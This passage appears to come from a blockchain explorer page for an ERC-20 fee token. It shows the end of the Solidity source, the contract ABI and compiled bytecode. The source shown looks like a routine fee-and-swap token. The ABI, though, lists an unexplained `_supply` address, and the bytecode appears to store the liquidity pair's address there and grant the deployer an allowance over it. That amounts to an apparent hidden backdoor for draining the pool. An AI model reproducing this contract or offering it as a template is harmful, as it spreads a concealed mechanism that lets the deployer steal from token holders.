                        amount <= maxTransactionAmount,
                        "Sell transfer amount exceeds the maxTransactionAmount."
                    );
                } else if (!_isExcludedMaxTransactionAmount[to]) {
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if (takeFee) {
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0) {
                fees = amount.mul(sellTotalFees).div(100);
				tokensForCharity += (fees * sellCharityFee) / sellTotalFees;
                tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees;
                tokensForDev += (fees * sellDevFee) / sellTotalFees;
                tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees;
            }
            // on buy
            else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) {
                fees = amount.mul(buyTotalFees).div(100);
				tokensForCharity += (fees * buyCharityFee) / buyTotalFees;
                tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees;
                tokensForDev += (fees * buyDevFee) / buyTotalFees;
                tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // approve token transfer to cover all possible scenarios
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // add the liquidity
        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            devWallet,
            block.timestamp
        );
    }

    receive() external payable {}

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this)); bool success;
        uint256 totalTokensToSwap = tokensForCharity + tokensForLiquidity + tokensForMarketing + tokensForDev;
        if (contractBalance == 0) {
            return;
        }
        if (contractBalance > swapTokensAtAmount * 20) {
            contractBalance = swapTokensAtAmount * 20;
        }
        
        uint256 liquidityTokens = (contractBalance * tokensForLiquidity) / totalTokensToSwap / 2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);

        uint256 initialETHBalance = address(this).balance;

        swapTokensForEth(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

		uint256 ethForCharity = ethBalance.mul(tokensForCharity).div(totalTokensToSwap);
        uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(totalTokensToSwap);
        uint256 ethForDev = ethBalance.mul(tokensForDev).div(totalTokensToSwap);

        uint256 ethForLiquidity = ethBalance - ethForCharity - ethForMarketing - ethForDev;

        tokensForLiquidity = 0;
		tokensForCharity = 0;
        tokensForMarketing = 0;
        tokensForDev = 0;

        (success, ) = address(devWallet).call{value: ethForDev}("");
        (success, ) = address(marketingWallet).call{value: ethForMarketing}("");


        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                tokensForLiquidity
            );
        }

        (success, ) = address(charityWallet).call{value: address(this).balance}("");
    }

    function enableTrading() external onlyOwner {
        tradingActive = true;
        swapEnabled = true;
    }

    function removeLimits() external onlyOwner {
        limitsInEffect = false;
        transferDelayEnabled = false;
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_supply","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCharityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"charityWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCharityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForCharity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c0604052600b805460ff19166001179055601c805462ffffff60a01b1916600160a01b1790553480156200003357600080fd5b50604080518082018252601581527f46616d6f7573204368696e657365204c6971756f72000000000000000000000060208083019182528351808501909452600684526573ccdef4c2c960d11b9084015281519192916200009791600491620007d0565b508051620000ad906005906020840190620007d0565b505050620000ca620000c4620004c860201b60201c565b620004cc565b6b033b2e3c9fd0803ce8000000737a250d5630b4cf539739df2c5dacb4c659f2488d6103e8620000fc83601e6200088c565b620001089190620008ae565b6007556103e86200011b83601e6200088c565b620001279190620008ae565b600955620186a06200013b8360036200088c565b620001479190620008ae565b600855620001578160016200051e565b6001600160a01b03811660808190526040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa158015620001a2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001c89190620008d1565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000216573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023c9190620008d1565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156200028a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002b09190620008d1565b6001600160a01b031660a0819052620002cb9060016200051e565b60a051620002db90600162000598565b6000600d819055600e819055600f819055601081905580808080808080808062000306818062000903565b62000312919062000903565b6200031e919062000903565b600c556012849055601383905560148290556015819055808262000343858762000903565b6200034f919062000903565b6200035b919062000903565b601155601c80546001600160a01b031990811633908117909255601a80548216909217909155601b805490911673966de2a02784f2e19953e699fe339a035d5b022b179055620003bf620003b76006546001600160a01b031690565b6001620005fe565b601c54620003d8906001600160a01b03166001620005fe565b601a54620003f1906001600160a01b03166001620005fe565b601b546200040a906001600160a01b03166001620005fe565b62000417306001620005fe565b6200042661dead6001620005fe565b620004456200043d6006546001600160a01b031690565b60016200051e565b601c546200045e906001600160a01b031660016200051e565b601a5462000477906001600160a01b031660016200051e565b601b5462000490906001600160a01b031660016200051e565b6200049d3060016200051e565b620004ac61dead60016200051e565b620004b8338b620006a8565b505050505050505050506200095b565b3390565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b031633146200056d5760405162461bcd60e51b8152602060048201819052602482015260008051602062002ba183398151915260448201526064015b60405180910390fd5b6001600160a01b03919091166000908152601e60205260409020805460ff1916911515919091179055565b6001600160a01b0382166000818152601f6020526040808220805460ff1916851515908117909155600380546001600160a01b0319168517905590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6006546001600160a01b03163314620006495760405162461bcd60e51b8152602060048201819052602482015260008051602062002ba1833981519152604482015260640162000564565b6001600160a01b0382166000818152601d6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b038216620007005760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640162000564565b6003546001600160a01b039081166000908152600160209081526040808320938616835292905290812080548392906200073c90849062000903565b92505081905550806002600082825462000757919062000903565b90915550506001600160a01b038216600090815260208190526040812080548392906200078690849062000903565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b828054620007de906200091e565b90600052602060002090601f0160209004810192826200080257600085556200084d565b82601f106200081d57805160ff19168380011785556200084d565b828001600101855582156200084d579182015b828111156200084d57825182559160200191906001019062000830565b506200085b9291506200085f565b5090565b5b808211156200085b576000815560010162000860565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615620008a957620008a962000876565b500290565b600082620008cc57634e487b7160e01b600052601260045260246000fd5b500490565b600060208284031215620008e457600080fd5b81516001600160a01b0381168114620008fc57600080fd5b9392505050565b6000821982111562000919576200091962000876565b500190565b600181811c908216806200093357607f821691505b602082108114156200095557634e487b7160e01b600052602260045260246000fd5b50919050565b60805160a0516121ef620009b2600039600081816104990152610ff401526000818161039c01528181610fb601528181611bba01528181611c7301528181611caf01528181611d290152611d9101526121ef6000f3fe6080604052600436106102975760003560e01c80637bce5a041161015a578063b62496f5116100c1578063dd62ed3e1161007a578063dd62ed3e146107b8578063e2f45605146107fe578063f11a24d314610814578063f2fde38b1461082a578063f63743421461084a578063f8b45b051461086057600080fd5b8063b62496f514610701578063bbc0c74214610731578063c024666814610752578063c876d0b914610772578063c8c8ebe41461078c578063d85ba063146107a257600080fd5b80639c3b4fdc116101135780639c3b4fdc146106695780639fccce321461067f578063a0d82dc514610695578063a1dc92bc146106ab578063a457c2d7146106c1578063a9059cbb146106e157600080fd5b80637bce5a04146105d55780638a8c523c146105eb5780638da5cb5b146106005780638ea5220f1461061e578063921369131461063e57806395d89b411461065457600080fd5b806339509351116101fe57806370a08231116101b757806370a0823114610513578063715018a614610549578063751039fc146105605780637571336a1461057557806375f0a874146105955780637b208769146105b557600080fd5b8063395093511461045157806344249f041461047157806349bd5a5e146104875780634a62bb65146104bb5780636a486a8e146104dc5780636ddd1713146104f257600080fd5b806318160ddd1161025057806318160ddd146103be5780631a8145bb146103d35780631f3fed8f146103e957806323b872dd146103ff57806327c8f8351461041f578063313ce5671461043557600080fd5b806306fdde03146102a3578063095ea7b3146102ce5780630d7f1441146102fe57806310d5de531461032257806315945790146103525780631694505e1461038a57600080fd5b3661029e57005b600080fd5b3480156102af57600080fd5b506102b8610876565b6040516102c59190611e09565b60405180910390f35b3480156102da57600080fd5b506102ee6102e9366004611e73565b610908565b60405190151581526020016102c5565b34801561030a57600080fd5b5061031460125481565b6040519081526020016102c5565b34801561032e57600080fd5b506102ee61033d366004611e9f565b601e6020526000908152604090205460ff1681565b34801561035e57600080fd5b50600354610372906001600160a01b031681565b6040516001600160a01b0390911681526020016102c5565b34801561039657600080fd5b506103727f000000000000000000000000000000000000000000000000000000000000000081565b3480156103ca57600080fd5b50600254610314565b3480156103df57600080fd5b5061031460185481565b3480156103f557600080fd5b5061031460175481565b34801561040b57600080fd5b506102ee61041a366004611ebc565b61091e565b34801561042b57600080fd5b5061037261dead81565b34801561044157600080fd5b50604051601281526020016102c5565b34801561045d57600080fd5b506102ee61046c366004611e73565b6109cd565b34801561047d57600080fd5b5061031460165481565b34801561049357600080fd5b506103727f000000000000000000000000000000000000000000000000000000000000000081565b3480156104c757600080fd5b50601c546102ee90600160a01b900460ff1681565b3480156104e857600080fd5b5061031460115481565b3480156104fe57600080fd5b50601c546102ee90600160b01b900460ff1681565b34801561051f57600080fd5b5061031461052e366004611e9f565b6001600160a01b031660009081526020819052604090205490565b34801561055557600080fd5b5061055e610a09565b005b34801561056c57600080fd5b5061055e610a3f565b34801561058157600080fd5b5061055e610590366004611efd565b610a82565b3480156105a157600080fd5b50601b54610372906001600160a01b031681565b3480156105c157600080fd5b50601a54610372906001600160a01b031681565b3480156105e157600080fd5b50610314600e5481565b3480156105f757600080fd5b5061055e610ad7565b34801561060c57600080fd5b506006546001600160a01b0316610372565b34801561062a57600080fd5b50601c54610372906001600160a01b031681565b34801561064a57600080fd5b5061031460135481565b34801561066057600080fd5b506102b8610b18565b34801561067557600080fd5b5061031460105481565b34801561068b57600080fd5b5061031460195481565b3480156106a157600080fd5b5061031460155481565b3480156106b757600080fd5b50610314600d5481565b3480156106cd57600080fd5b506102ee6106dc366004611e73565b610b27565b3480156106ed57600080fd5b506102ee6106fc366004611e73565b610bc0565b34801561070d57600080fd5b506102ee61071c366004611e9f565b601f6020526000908152604090205460ff1681565b34801561073d57600080fd5b50601c546102ee90600160a81b900460ff1681565b34801561075e57600080fd5b5061055e61076d366004611efd565b610bcd565b34801561077e57600080fd5b50600b546102ee9060ff1681565b34801561079857600080fd5b5061031460075481565b3480156107ae57600080fd5b50610314600c5481565b3480156107c457600080fd5b506103146107d3366004611f3b565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b34801561080a57600080fd5b5061031460085481565b34801561082057600080fd5b50610314600f5481565b34801561083657600080fd5b5061055e610845366004611e9f565b610c56565b34801561085657600080fd5b5061031460145481565b34801561086c57600080fd5b5061031460095481565b60606004805461088590611f69565b80601f01602080910402602001604051908101604052809291908181526020018280546108b190611f69565b80156108fe5780601f106108d3576101008083540402835291602001916108fe565b820191906000526020600020905b8154815290600101906020018083116108e157829003601f168201915b5050505050905090565b6000610915338484610cf1565b50600192915050565b600061092b848484610e15565b6001600160a01b0384166000908152600160209081526040808320338452909152902054828110156109b55760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6109c28533858403610cf1565b506001949350505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610915918590610a04908690611fba565b610cf1565b6006546001600160a01b03163314610a335760405162461bcd60e51b81526004016109ac90611fd2565b610a3d60006116d3565b565b6006546001600160a01b03163314610a695760405162461bcd60e51b81526004016109ac90611fd2565b601c805460ff60a01b19169055600b805460ff19169055565b6006546001600160a01b03163314610aac5760405162461bcd60e51b81526004016109ac90611fd2565b6001600160a01b03919091166000908152601e60205260409020805460ff1916911515919091179055565b6006546001600160a01b03163314610b015760405162461bcd60e51b81526004016109ac90611fd2565b601c805461ffff60a81b191661010160a81b179055565b60606005805461088590611f69565b3360009081526001602090815260408083206001600160a01b038616845290915281205482811015610ba95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016109ac565b610bb63385858403610cf1565b5060019392505050565b6000610915338484610e15565b6006546001600160a01b03163314610bf75760405162461bcd60e51b81526004016109ac90611fd2565b6001600160a01b0382166000818152601d6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6006546001600160a01b03163314610c805760405162461bcd60e51b81526004016109ac90611fd2565b6001600160a01b038116610ce55760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016109ac565b610cee816116d3565b50565b6001600160a01b038316610d535760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016109ac565b6001600160a01b038216610db45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016109ac565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610e3b5760405162461bcd60e51b81526004016109ac90612007565b6001600160a01b038216610e615760405162461bcd60e51b81526004016109ac9061204c565b80610e7757610e7283836000611725565b505050565b601c54600160a01b900460ff161561133d576006546001600160a01b03848116911614801590610eb557506006546001600160a01b03838116911614155b8015610ec957506001600160a01b03821615155b8015610ee057506001600160a01b03821661dead14155b8015610ef65750600654600160a01b900460ff16155b1561133d57601c54600160a81b900460ff16610f90576001600160a01b0383166000908152601d602052604090205460ff1680610f4b57506001600160a01b0382166000908152601d602052604090205460ff165b610f905760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016109ac565b600b5460ff16156110d7576006546001600160a01b03838116911614801590610feb57507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b031614155b801561102957507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b031614155b156110d757326000908152600a602052604090205443116110c45760405162461bcd60e51b815260206004820152604960248201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60448201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b6064820152681030b63637bbb2b21760b91b608482015260a4016109ac565b326000908152600a602052604090204390555b6001600160a01b0383166000908152601f602052604090205460ff16801561111857506001600160a01b0382166000908152601e602052604090205460ff16155b156111fc5760075481111561118d5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016109ac565b6009546001600160a01b0383166000908152602081905260409020546111b39083611fba565b11156111f75760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ac565b61133d565b6001600160a01b0382166000908152601f602052604090205460ff16801561123d57506001600160a01b0383166000908152601e602052604090205460ff16155b156112b3576007548111156111f75760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016109ac565b6001600160a01b0382166000908152601e602052604090205460ff1661133d576009546001600160a01b0383166000908152602081905260409020546112f99083611fba565b111561133d5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ac565b306000908152602081905260409020546008548110801590819061136a5750601c54600160b01b900460ff165b80156113805750600654600160a01b900460ff16155b80156113a557506001600160a01b0385166000908152601f602052604090205460ff16155b80156113ca57506001600160a01b0385166000908152601d602052604090205460ff16155b80156113ef57506001600160a01b0384166000908152601d602052604090205460ff16155b1561141d576006805460ff60a01b1916600160a01b17905561140f61187a565b6006805460ff60a01b191690555b6006546001600160a01b0386166000908152601d602052604090205460ff600160a01b90920482161591168061146b57506001600160a01b0385166000908152601d602052604090205460ff165b15611474575060005b600081156116bf576001600160a01b0386166000908152601f602052604090205460ff1680156114a657506000601154115b15611594576114cb60646114c560115488611b3890919063ffffffff16565b90611b4b565b9050601154601254826114de919061208f565b6114e891906120ae565b601660008282546114f99190611fba565b909155505060115460145461150e908361208f565b61151891906120ae565b601860008282546115299190611fba565b909155505060115460155461153e908361208f565b61154891906120ae565b601960008282546115599190611fba565b909155505060115460135461156e908361208f565b61157891906120ae565b601760008282546115899190611fba565b909155506116a19050565b6001600160a01b0387166000908152601f602052604090205460ff1680156115be57506000600c54115b156116a1576115dd60646114c5600c5488611b3890919063ffffffff16565b9050600c54600d54826115f0919061208f565b6115fa91906120ae565b6016600082825461160b9190611fba565b9091555050600c54600f54611620908361208f565b61162a91906120ae565b6018600082825461163b9190611fba565b9091555050600c54601054611650908361208f565b61165a91906120ae565b6019600082825461166b9190611fba565b9091555050600c54600e54611680908361208f565b61168a91906120ae565b6017600082825461169b9190611fba565b90915550505b80156116b2576116b2873083611725565b6116bc81866120d0565b94505b6116ca878787611725565b50505050505050565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b03831661174b5760405162461bcd60e51b81526004016109ac90612007565b6001600160a01b0382166117715760405162461bcd60e51b81526004016109ac9061204c565b6001600160a01b038316600090815260208190526040902054818110156117e95760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016109ac565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290611820908490611fba565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161186c91815260200190565b60405180910390a350505050565b3060009081526020819052604081205490506000806019546017546018546016546118a59190611fba565b6118af9190611fba565b6118b99190611fba565b9050826118c557505050565b6008546118d390601461208f565b8311156118eb576008546118e890601461208f565b92505b6000600282601854866118fe919061208f565b61190891906120ae565b61191291906120ae565b905060006119208583611b57565b90504761192c82611b63565b60006119384783611b57565b90506000611955866114c560165485611b3890919063ffffffff16565b90506000611972876114c560175486611b3890919063ffffffff16565b9050600061198f886114c560195487611b3890919063ffffffff16565b90506000818361199f86886120d0565b6119a991906120d0565b6119b391906120d0565b60006018819055601681905560178190556019819055601c546040519293506001600160a01b031691849181818185875af1925050503d8060008114611a15576040519150601f19603f3d011682016040523d82523d6000602084013e611a1a565b606091505b5050601b54604051919b506001600160a01b0316908490600081818185875af1925050503d8060008114611a6a576040519150601f19603f3d011682016040523d82523d6000602084013e611a6f565b606091505b50909a50508715801590611a835750600081115b15611ad657611a928882611d23565b601854604080518981526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b601a546040516001600160a01b03909116904790600081818185875af1925050503d8060008114611b23576040519150601f19603f3d011682016040523d82523d6000602084013e611b28565b606091505b5050505050505050505050505050565b6000611b44828461208f565b9392505050565b6000611b4482846120ae565b6000611b4482846120d0565b6040805160028082526060820183526000926020830190803683370190505090503081600081518110611b9857611b986120e7565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c16573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611c3a91906120fd565b81600181518110611c4d57611c4d6120e7565b60200260200101906001600160a01b031690816001600160a01b031681525050611c98307f000000000000000000000000000000000000000000000000000000000000000084610cf1565b60405163791ac94760e01b81526001600160a01b037f000000000000000000000000000000000000000000000000000